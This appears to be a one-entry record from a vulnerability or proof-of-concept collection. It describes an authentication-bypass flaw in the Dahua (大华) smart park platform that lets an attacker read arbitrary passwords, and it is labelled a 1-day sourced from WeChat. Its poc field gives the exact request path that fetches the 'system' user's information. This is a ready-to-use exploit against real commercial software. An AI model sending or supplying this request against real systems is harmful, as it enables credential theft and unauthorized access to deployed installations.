vendor = "大华"
name = "大华智慧园区任意密码读取攻击"
type = "认证绕过"
source = "微信"
info = "/admin/user_getUserInfoByUserName.action?userName=system"
date = "08.11"
poc = "/admin/user_getUserInfoByUserName.action?userName=system"
label = "1day"
